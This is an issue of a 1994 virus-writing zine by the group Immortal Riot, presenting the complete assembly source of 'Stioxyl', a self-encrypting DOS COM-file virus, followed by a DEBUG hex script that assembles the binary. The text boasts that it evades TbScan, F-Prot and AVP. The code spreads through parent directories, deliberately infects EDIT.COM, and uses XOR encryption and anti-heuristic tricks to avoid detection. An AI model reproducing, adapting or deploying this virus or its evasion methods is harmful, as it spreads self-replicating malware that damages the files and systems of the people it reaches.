Insane Reality issue #6 - (c)opyright 1994 Immortal Riot File 008 ; ------------------------------------------------------------------------------ ; ; - Stioxyl - ; Created by Immortal Riot's destructive development team ; (c) 1994 The Unforgiven/Immortal Riot ; ; ------------------------------------------------------------------------------ ; þ Undetectable COM-infector þ ; ------------------------------------------------------------------------------ Replicating: This will infect all comfiles in the current directory, and directory below in the three structure. It also direct-infects edit.com for making it into a better replicator. It clears and restore the file-attributes, file-and time stamp, but alter the file's second value to use as infection marker. It will not infect too small, or too big files, and it won't touch files on floppies. Anti-Virus-Detection: Tbscan 6.26 hardest heuristic cannot find shits, and neither can F-Prot, AVP or any other lousy scanner. Pay-Load: This virus has no activating routine at all, making this virus a bit too nice. Well, viruses are used for different purposes, right? So there is no need that all should be highly destructive. .model tiny .radix 16 .code org 100h start: storbuf db 00,00,00,00 ; for first generation only! v_start: mov sp,102h ; get the delta offset so tbscan cant call get_delta ; flag it as flexible entry point get_delta: ; mov bp,word ptr ds:[100h] mov sp,0fffeh sub bp,offset get_delta go_back: mov ax,0305h ; this code was included to avoid detection xor bx,bx ; from tbscan. The vsafe disabeling code can int 16h ; be used as well, but f-prot heuristics ; complains about it. call en_de_crypt ; decrypt the virus jmp short real_start ; and continue... encrypt_value dw 0 ; random xor (encryption) value write_virus: call en_de_crypt ; write encrypted copy of the virus mov ah,40 ; mov cx,code_end-v_start ; # bytes lea dx,[bp+v_start] ; dx:100h int 21 ; call en_de_crypt ; decrypt virus again for further processing ret en_de_crypt: mov ax,word ptr [bp+encrypt_value] lea si,[bp+real_start] mov cx,(enc_end-real_start+1)/2 xor_loopie: xor word ptr [si],ax ; encrypts two bytes/loop until all inc si ; code between real_start and enc_end inc si ; are encrypted loop xor_loopie ret real_start: get_drive: mov ah,19h ; get drive from where we are executed from int 21h ; check if it's a: or b: cmp al,2 ; if so, return control to the original jb quit ; program without infecting other files get_dir: mov ah,47h ; get directory from where we are xor dl,dl ; being executed from lea si,[bp+code_end+2ch] ; int 21h lea si,[bp+org_buf] ; move the firsts 3 bytes mov di,100 ; from the beginning di:100h, movsw ; to a buffer called org_buf movsb ; lea dx,[bp+code_end] ; set our own dta to code_end, so mov ah,1ah ; the paramters when findfiles arent int 21h ; destroyed lea dx,[bp+direct_infect] ; if present, infect call dirinfect ; \dos\edit.com findfirst: mov ah,4e ; search for com files mov cx,7 ; any attribute lea dx,[bp+com_files] ; matchine with the extension find_next: ; 'COM' int 21 jc dot_dot ; no more files, seek next directory! call infect ; found a find, infect it! mov ah,4f ; search next file jmp short find_next ; and see if we find one dot_dot: mov ah,3bh ; move directory lea dx,[bp+ch_dir] ; to '..' int 21h jnc findfirst ; if not '\' => findfirst file ; in the new location restore_dir: mov ah,3bh ; restore directory lea dx,[bp+code_end+2ch] ; from where we was executed int 21h ; and.. no_more_files: ; mov dx,80 ; set the dta to 80h (default) mov ah,1ah int 21h quit: ; mov di,100 ; return control to original program push di ; ret infect: lea dx,[bp+code_end+1eh] ; 1e = adress to filename in ds:dx in our ; new dta area! dirinfect: mov ax,4301h ; set attributes xor cx,cx ; to nothing int 21h open_file: mov ax,3d02h ; open file int 21 ; in read/write mode jnc infect_it ; if the file \dos\edit.com doesnt exist ret ; return, and search first comfile infect_it: xchg bx,ax ; filehandle in bx mov ax,5700 ; get time/date int 21 push dx ; save date push cx ; save time mov ah,3f ; read the first three bytes mov cx,3 ; of the file to org_buf lea dx,[bp+org_buf] int 21 mov ax,word ptr [bp+code_end+16h] ; get file-time and al,00011111b cmp al,00010101b ; sec = 10? je finish_infect ; assume previous infection cmp byte ptr [bp+org_buf+1],0F7h ; dosedit.com after jz finish_infect ; first infection cmp byte ptr [bp+org_buf+1],6Dh ; command.com jz finish_infect ; mov ax, word ptr [bp+code_end+1ah] ; virus size * 2 cmp ax,786d ; jb finish_infect cmp ax,65143d ; 1024 * 64 - virus size ja finish_infect ; mov ax,4202 ; move file-pointer xor cx,cx ; to end of file cwd int 21 sub ax,3 ; substract bytes mov word ptr [bp+first_three+1],ax ; to our own jump get_value: mov ah,2ch ; get system clock for int 21h ; 1/100 of a second jz get_value ; if zero = get new value mov word ptr [bp+encrypt_value],dx ; otherwise, use as enc value call write_virus ; write virus to end of file mov ax,4200 ; move file-pointer to xor cx,cx ; top of file cwd int 21 mov ah,40 ; write our own jump mov cx,3 ; instruction to the lea dx,[bp+first_three] ; beginning int 21 finish_infect: mov ax,5701h ; set back pop cx ; time pop dx ; date and cl,11100000b ; but alter the or cl,00010101b ; second value int 21h ; mov ah,3eh ; close file int 21 mov ax,4301h ; set back the original file attributes xor ch,ch ; stamp, on the files we altered lea dx,[bp+code_end+1eh] ; mov cl,byte ptr [bp+code_end+15h] int 21h ret ; return and continue! v_name db "[Stioxyl] (c) '94 The Unforgiven/Immortal Riot" direct_infect db '\DOS\EDIT.COM',0 com_files db '*.com',0 ch_dir db '..',0 ; dot-dot to change directory first_three db 0e9,90,90 ; buffer to calculate a new entry org_buf db 90,0CDh,20 ; buffer to save first three bytes in enc_end: code_end: end start -------------------------------------------------------------------------------- N stio.com E 100 00 00 00 00 BC 02 01 E8 00 00 8B 2E 00 01 BC FE E 110 FF 81 ED 0A 01 B8 05 03 33 DB CD 16 E8 16 00 EB E 120 26 00 00 E8 0F 00 B4 40 B9 86 01 8D 96 04 01 CD E 130 21 E8 01 00 C3 8B 86 21 01 8D B6 47 01 B9 A2 00 E 140 31 04 46 46 E2 FA C3 B4 19 CD 21 3C 02 72 4F B4 E 150 47 32 D2 8D B6 B6 02 CD 21 8D B6 87 02 BF 00 01 E 160 A5 A4 8D 96 8A 02 B4 1A CD 21 8D 96 6D 02 E8 36 E 170 00 B4 4E B9 07 00 8D 96 7B 02 CD 21 72 07 E8 22 E 180 00 B4 4F EB F5 B4 3B 8D 96 81 02 CD 21 73 E2 B4 E 190 3B 8D 96 B6 02 CD 21 BA 80 00 B4 1A CD 21 BF 00 E 1a0 01 57 C3 8D 96 A8 02 B8 01 43 33 C9 CD 21 B8 02 E 1b0 3D CD 21 73 01 C3 93 B8 00 57 CD 21 52 51 B4 3F E 1c0 B9 03 00 8D 96 87 02 CD 21 8B 86 A0 02 24 1F 3C E 1d0 15 74 4B 80 BE 88 02 F7 74 44 80 BE 88 02 6D 74 E 1e0 3D 8B 86 A4 02 3D 12 03 72 34 3D 77 FE 77 2F B8 E 1f0 02 42 33 C9 99 CD 21 2D 03 00 89 86 85 02 B4 2C E 200 CD 21 74 FA 89 96 21 01 E8 18 FF B8 00 42 33 C9 E 210 99 CD 21 B4 40 B9 03 00 8D 96 84 02 CD 21 B8 01 E 220 57 59 5A 80 E1 E0 80 C9 15 CD 21 B4 3E CD 21 B8 E 230 01 43 32 ED 8D 96 A8 02 8A 8E 9F 02 CD 21 C3 5B E 240 53 74 69 6F 78 79 6C 5D 20 28 63 29 20 27 39 34 E 250 20 54 68 65 20 55 6E 66 6F 72 67 69 76 65 6E 2F E 260 49 6D 6D 6F 72 74 61 6C 20 52 69 6F 74 5C 44 4F E 270 53 5C 45 44 49 54 2E 43 4F 4D 00 2A 2E 63 6F 6D E 280 00 2E 2E 00 E9 90 90 90 CD 20 RCX 18a W Q